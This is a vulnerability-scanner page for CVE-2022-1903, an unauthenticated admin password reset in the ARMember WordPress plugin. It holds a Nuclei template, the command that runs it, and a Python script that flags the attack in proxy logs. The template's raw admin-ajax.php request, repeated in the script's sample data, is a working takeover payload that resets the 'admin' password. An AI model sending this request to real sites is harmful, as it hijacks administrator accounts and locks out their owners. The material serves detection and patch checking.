ARMember < 3.4.8 - Unauthenticated Admin Account Takeover
ID: CVE-2022-1903
Severity: high
Author: theamanrawat
Tags: cve,cve2022,account-takeover,wpscan,wordpress,wp-plugin,wp,armember-membership,unauthenticated,armemberplugin
Description
The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username.
YAML Source
id: CVE-2022-1903

info:
  name: ARMember < 3.4.8 - Unauthenticated Admin Account Takeover
  author: theamanrawat
  severity: high
  description: |
    The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username.
  impact: |
    An attacker can gain unauthorized access to the admin account, potentially leading to further compromise of the system.
  remediation: Fixed in version 3.4.8
  reference:
    - https://wpscan.com/vulnerability/28d26aa6-a8db-4c20-9ec7-39821c606a08
    - https://wordpress.org/plugins/armember-membership/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1903
    - https://github.com/SYRTI/POC_to_review
    - https://github.com/WhooAmii/POC_to_review
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2022-1903
    cwe-id: CWE-862
    epss-score: 0.70044
    epss-percentile: 0.98014
    cpe: cpe:2.3:a:armemberplugin:armember:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: armemberplugin
    product: armember
    framework: wordpress
  tags: cve,cve2022,account-takeover,wpscan,wordpress,wp-plugin,wp,armember-membership,unauthenticated,armemberplugin

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Your Password has been reset"
          - "arm_success_msg"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022002493caa4a814e62b7356901a9fe76fd2ea835647ed594f78635ea5f483466590221009c6efec0b87d495fe0e555c000ec8eb2f9db80581aa687a347d0cc0eabfb6638:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the vulnerability in a target web application. Run it with the Nuclei tool, which sends the request above and reports a match when the response satisfies all three matchers.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1903.yaml"
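For defenders, the request shape the template sends is also a signature worth looking for in logs from a reverse proxy or WAF that records POST bodies. The following Python is an added example, not part of the template or of the Nuclei project: it parses request records, flags the admin-ajax.php call shape from the template (action=arm_shortcode_form_ajax_action together with arm_action=change-password and action2=rp) and reports the targeted login. The sample records are constructed. Whether the plugin's legitimate forms send the same action name for authenticated users is an assumption, so treat a hit as something to correlate with session state and the installed plugin version (fixed in 3.4.8) rather than as proof of compromise.

```python
from urllib.parse import parse_qs

# Constructed sample request records, in the shape a reverse proxy or WAF
# that logs request bodies might emit (not real traffic).
SAMPLE_REQUESTS = [
    {"src": "203.0.113.7", "method": "POST", "path": "/wp-admin/admin-ajax.php",
     "body": "action=arm_shortcode_form_ajax_action&user_pass=Xk9&repeat_pass=Xk9"
             "&arm_action=change-password&key2=x&action2=rp&login2=admin"},
    {"src": "198.51.100.2", "method": "POST", "path": "/wp-admin/admin-ajax.php",
     "body": "action=heartbeat&_nonce=abc123"},
    {"src": "203.0.113.7", "method": "POST", "path": "/wp-admin/admin-ajax.php",
     "body": "action=arm_shortcode_form_ajax_action&arm_action=login&user_login=bob"},
    {"src": "192.0.2.9", "method": "GET", "path": "/wp-login.php", "body": ""},
]


def is_armember_password_reset(record):
    """Return the targeted username when the record matches the CVE-2022-1903
    request shape used by the template, otherwise None."""
    if record.get("method", "").upper() != "POST":
        return None
    if not record.get("path", "").endswith("/wp-admin/admin-ajax.php"):
        return None
    # parse_qs returns a list per key; take the first value of each.
    params = parse_qs(record.get("body", ""), keep_blank_values=True)

    def first(key):
        return params.get(key, [""])[0]

    if first("action") != "arm_shortcode_form_ajax_action":
        return None
    # Both the password-change action and the reset flag must be present.
    if first("arm_action") != "change-password" or first("action2") != "rp":
        return None
    return first("login2") or "<unknown>"


def find_reset_attempts(records):
    """Return (source, targeted login) pairs for every matching record."""
    hits = []
    for record in records:
        target = is_armember_password_reset(record)
        if target is not None:
            hits.append((record.get("src", "?"), target))
    return hits


if __name__ == "__main__":
    for src, target in find_reset_attempts(SAMPLE_REQUESTS):
        print(f"ARMember password reset attempt from {src} targeting user '{target}'")
```

Feed it the records your proxy or WAF produces (map its field names onto src, method, path and body); a hit from an unauthenticated source against an installation older than 3.4.8 is the case the template exploits.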